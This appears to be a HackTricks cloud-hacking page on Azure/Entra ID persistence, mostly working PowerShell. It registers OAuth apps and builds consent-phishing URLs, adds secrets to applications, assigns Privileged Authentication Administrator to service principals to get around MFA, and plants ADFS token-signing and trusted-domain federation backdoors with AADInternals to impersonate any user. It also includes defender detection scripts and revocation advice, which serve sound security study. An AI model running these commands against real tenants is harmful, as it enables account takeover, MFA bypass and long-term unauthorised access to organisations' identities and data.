Az - Persistence
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
OAuth Application
By default, any user can register an application in Entra ID. So you can register an application (single-tenant, i.e. only usable in the target tenant) that requests high-impact permissions which need admin consent (and consent to it yourself if you are an admin), such as sending mail on behalf of users, role management, etc. This lets you run OAuth consent phishing attacks that are very profitable if a privileged user (or an admin consenting for the whole tenant) accepts the prompt.
Moreover, you can also consent to that application with your own user as a way to keep access to that account: the refresh tokens issued to the app keep working until the consent grant is revoked, independently of the user's password.
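As an added example (not code from the original page), the following Microsoft Graph PowerShell script registers such a single-tenant app, resolves the permission IDs from Graph's own service principal instead of hardcoding GUIDs, grants tenant-wide admin consent, builds the consent URL a lure would use, and finally lists every tenant-wide grant so a defender can spot this. The app name, redirect URI and chosen scopes are assumptions.

```powershell
# Added example, not from the original page. Requires the Microsoft.Graph module.
# 'Contoso Mail Sync', the redirect URI and the scope list are assumptions for the demo.
Connect-MgGraph -Scopes 'Application.ReadWrite.All','DelegatedPermissionGrant.ReadWrite.All'
$tenantId = (Get-MgContext).TenantId

# Microsoft Graph's service principal; this appId is the same in every tenant
$graphSp = Get-MgServicePrincipal -Filter "appId eq '00000003-0000-0000-c000-000000000000'"

# Resolve delegated permission (scope) IDs dynamically
$wanted = 'Mail.Send', 'User.Read', 'Directory.ReadWrite.All'
$scopes = $graphSp.Oauth2PermissionScopes | Where-Object { $wanted -contains $_.Value }

$requiredAccess = @{
    ResourceAppId  = $graphSp.AppId
    ResourceAccess = @($scopes | ForEach-Object { @{ Id = $_.Id; Type = 'Scope' } })
}

# Single-tenant registration (AzureADMyOrg): only usable in the target tenant, as the text says
$app = New-MgApplication -DisplayName 'Contoso Mail Sync' -SignInAudience 'AzureADMyOrg' `
    -RequiredResourceAccess @($requiredAccess) `
    -Web @{ RedirectUris = @('https://localhost/callback') }
$sp = New-MgServicePrincipal -AppId $app.AppId

# Tenant-wide admin consent: only works if the caller is an admin allowed to consent
New-MgOauth2PermissionGrant -ClientId $sp.Id -ConsentType 'AllPrincipals' `
    -ResourceId $graphSp.Id -Scope ($scopes.Value -join ' ')

# Consent URL for the phishing lure; Directory.ReadWrite.All needs an admin to accept it
$scopeParam = [uri]::EscapeDataString((($scopes.Value | ForEach-Object { "https://graph.microsoft.com/$_" }) -join ' '))
$redirect   = [uri]::EscapeDataString('https://localhost/callback')
$consentUrl = "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/authorize?client_id=$($app.AppId)&response_type=code&redirect_uri=$redirect&scope=$scopeParam&prompt=consent"
$consentUrl

# Defender check: every tenant-wide delegated grant and the client it was given to
Get-MgOauth2PermissionGrant -All | Where-Object { $_.ConsentType -eq 'AllPrincipals' } | ForEach-Object {
    $client = Get-MgServicePrincipal -ServicePrincipalId $_.ClientId
    [pscustomobject]@{ Client = $client.DisplayName; AppId = $client.AppId; Scope = $_.Scope }
}
```

Revoking the backdoor means deleting the oAuth2PermissionGrant (and any per-user grants with ConsentType Principal), not just resetting the victim's password; restricting user consent in the Enterprise applications settings removes the phishing path for non-admins.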
Applications and Service Principals
With Application Administrator, Global Administrator (GA) or a custom role holding the microsoft.directory/applications/credentials/update permission, we can add a credential (a secret or a certificate) to an existing application.
You can either target an application that already holds high permissions or add a new application and grant it high permissions.
An interesting role to assign to the application is Privileged Authentication Administrator, since it allows resetting the passwords of Global Administrators.
This technique also bypasses MFA: a service principal signing in with its own credential is not subject to the user MFA requirements of Conditional Access.
```powershell
# Sign in as the service principal with the secret that was added (application/client ID as user name)
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant e12984235-1035-452e-bd32-ab4d72639a
```
- For certificate-based authentication (the certificate must be in the local certificate store):
```powershell
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
```
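The full chain described above, as an added example that is not part of the original page: add a long-lived secret to an existing application through Microsoft Graph, give its service principal the Privileged Authentication Administrator directory role, sign in as that service principal, and then (from the defender's side) list application credentials with suspicious lifetimes or recent creation dates. The target app name 'Contoso Mail Sync' is an assumption; the Microsoft.Graph and Az.Accounts modules are required.

```powershell
# Added example, not from the original page. 'Contoso Mail Sync' is an assumed target app.
Connect-MgGraph -Scopes 'Application.ReadWrite.All','RoleManagement.ReadWrite.Directory'
$tenantId = (Get-MgContext).TenantId

# 1. Pick the target application and its service principal (use -Filter "appId eq '...'" if you know the ID)
$app = Get-MgApplication -Filter "displayName eq 'Contoso Mail Sync'"
$sp  = Get-MgServicePrincipal -Filter "appId eq '$($app.AppId)'"

# 2. Add a password credential with a two-year lifetime; SecretText is only returned here, once
$cred = Add-MgApplicationPassword -ApplicationId $app.Id -PasswordCredential @{
    DisplayName = 'backup-sync'
    EndDateTime = (Get-Date).AddYears(2)
}
$secret = $cred.SecretText

# 3. Assign Privileged Authentication Administrator to the SP at tenant scope (caller needs PRA or GA)
$roleDef = Get-MgRoleManagementDirectoryRoleDefinition -Filter "displayName eq 'Privileged Authentication Administrator'"
New-MgRoleManagementDirectoryRoleAssignment -PrincipalId $sp.Id -RoleDefinitionId $roleDef.Id -DirectoryScopeId '/'

# 4. Authenticate as the service principal; no MFA prompt applies to this sign-in
$passwd = ConvertTo-SecureString $secret -AsPlainText -Force
$creds  = New-Object System.Management.Automation.PSCredential($app.AppId, $passwd)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant $tenantId

# 5. Defender check: flag app credentials valid for more than a year or created in the last 7 days
Get-MgApplication -All -Property Id,DisplayName,PasswordCredentials,KeyCredentials | ForEach-Object {
    foreach ($c in (@($_.PasswordCredentials) + @($_.KeyCredentials))) {
        if (-not $c) { continue }
        $days = ($c.EndDateTime - $c.StartDateTime).TotalDays
        if ($days -gt 365 -or $c.StartDateTime -gt (Get-Date).AddDays(-7)) {
            [pscustomobject]@{ App = $_.DisplayName; Cred = $c.DisplayName; Start = $c.StartDateTime; End = $c.EndDateTime; Days = [int]$days }
        }
    }
}
```

The role assignment in step 3 is what makes the persistence dangerous: the audit log records it as "Add member to role" with the service principal as target, which is the event a detection rule should key on, together with "Update application – Certificates and secrets management".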
Federation - Token Signing Certificate
With DA privileges on the on-prem AD, it is possible to create and import new Token Signing and Token Decrypting certificates that have a very long validity. This will allow us to log in as any user whose ImmutableID we know, as long as Entra ID keeps trusting those certificates.
Run the command below as DA on the ADFS server(s) to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollover and restart the service:
```powershell
New-AADIntADFSSelfSignedCertificates
```
Then update the certificate information in Azure AD (Entra ID):
```powershell
Update-AADIntADFSFederationSettings -Domain cyberranges.io
```
Federation - Trusted Domain
With GA privileges on a tenant, it's possible to add a new domain (it must be verified), set its authentication type to Federated and configure the domain to trust a specific certificate (any.sts in the command below) and issuer. Entra ID then accepts SAML tokens signed with that certificate for any user whose ImmutableID is known:
```powershell
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
# Get the ImmutableID of the user we want to impersonate. Using the Msol module
Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user (the MFA bypass works because the federated IdP asserts the MFA claim itself)
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA $true
```
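Both federation backdoors (the replaced token-signing certificate and the added trusted domain) leave traces in the tenant's federation configuration. As an added example that is not part of the original page, the script below reads every federated domain through Microsoft Graph and flags the patterns above: signing certificates with an unusually long validity, certificates whose thumbprints are not the ones on your real ADFS farm, an issuer URI that is not your farm, and configurations that still accept the MFA claim from the federated IdP. The expected issuer prefix, the 400-day threshold and the known-good thumbprint list are assumptions to adapt to your environment.

```powershell
# Added example, not from the original page. Requires the Microsoft.Graph module.
# Assumptions: your ADFS issuer, the validity threshold, and the known-good thumbprints
# (obtain them on the ADFS server with: Get-AdfsCertificate -CertificateType Token-Signing).
Connect-MgGraph -Scopes 'Domain.Read.All'
$expectedIssuerPrefix = 'http://adfs.cyberranges.io/adfs/services/trust'
$maxDays              = 400
$knownThumbprints     = @()   # e.g. 'A1B2...'; leave empty to skip this comparison

function Get-CertInfo([string]$b64) {
    # Graph returns the signing certificates as base64 DER; decode and summarise them
    if (-not $b64) { return $null }
    $x = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new([Convert]::FromBase64String($b64))
    [pscustomobject]@{
        Subject    = $x.Subject
        Thumbprint = $x.Thumbprint
        NotBefore  = $x.NotBefore
        NotAfter   = $x.NotAfter
        Days       = [int]($x.NotAfter - $x.NotBefore).TotalDays
    }
}

function Test-FederationConfig {
    foreach ($d in (Get-MgDomain -All | Where-Object { $_.AuthenticationType -eq 'Federated' })) {
        foreach ($cfg in (Get-MgDomainFederationConfiguration -DomainId $d.Id)) {
            $flags = @()
            if ($cfg.IssuerUri -notlike "$expectedIssuerPrefix*") {
                $flags += "unexpected issuer $($cfg.IssuerUri)"
            }
            # Anything other than rejectMfaByFederatedIdp lets a forged token carry its own MFA claim
            if ($cfg.FederatedIdpMfaBehavior -ne 'rejectMfaByFederatedIdp') {
                $flags += "MFA claim trusted from IdP ($($cfg.FederatedIdpMfaBehavior))"
            }
            foreach ($slot in 'SigningCertificate', 'NextSigningCertificate') {
                $c = Get-CertInfo $cfg.$slot
                if (-not $c) { continue }
                if ($c.Days -gt $maxDays) {
                    $flags += "$slot valid $($c.Days) days ($($c.Thumbprint), $($c.Subject))"
                }
                if ($knownThumbprints.Count -gt 0 -and $knownThumbprints -notcontains $c.Thumbprint) {
                    $flags += "$slot thumbprint $($c.Thumbprint) not on the ADFS farm"
                }
            }
            [pscustomobject]@{ Domain = $d.Id; Issuer = $cfg.IssuerUri; Flags = ($flags -join '; ') }
        }
    }
}

Test-FederationConfig | Format-Table -AutoSize -Wrap
```

A domain you never federated appearing in this output is the trusted-domain backdoor; a known domain whose signing certificate suddenly has a multi-year validity or an unknown thumbprint is the replaced token-signing certificate. Rolling the ADFS certificates and running Update-MgDomainFederationConfiguration (or removing the domain) closes both.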